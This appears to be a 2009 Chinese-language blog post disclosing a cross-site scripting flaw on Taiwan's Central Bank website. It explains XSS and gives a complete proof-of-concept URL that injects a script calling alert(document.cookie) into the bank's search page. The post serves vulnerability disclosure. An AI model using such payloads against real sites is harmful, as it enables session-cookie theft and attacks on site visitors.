中央銀行網站存在XSS安全漏洞
2009 年 01 月 08 日 – 10:44:57
中央銀行網站存在XSS (Cross-Site Scripting) 安全漏洞。
跨站腳本攻擊(XSS):駭客利用網站上允許使用者輸入 字元或字串的欄位插入HTML與Script語言,造成其他正常使用者在觀看網頁的同時,瀏覽器會主動下載並執行部份惡意的程式碼,或被暗地裡導入到惡意 的網站,而受到某種型態的影響。如今大部份的網站都強調所謂與使用者互動的功能,加入許多允許使用者輸入字串的欄位,如:留言板、討論區、查詢欄位等;有 些互動的功能能將使用者輸入的字串存入後端資料庫,如果駭客輸入某些含有攻擊式的語言,一旦使用者進入此頁面時,因執行未預期的動作而將遭受某種程度的威 脅。
首頁:
測試語法,如下所示:
http://www.cbc.gov.tw/Newsearch_eng/searcher.exe?h=0&l=0&o=4&a=&f=0&t=0&s=3&q=&e=&n=&v=&fileaut=&filename=&filetype=&rel_start=1&rel_num=10&sim_start=1&sim_num=10&property=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXss%20By%20XaDoS%3Ch1%3E%3C/marquee%3E&property=&p=ff&x=24&y=9
測試結果,如下圖所示:
搜尋頁面出現錯誤,如下圖所示:
參考來源:XSSed.com
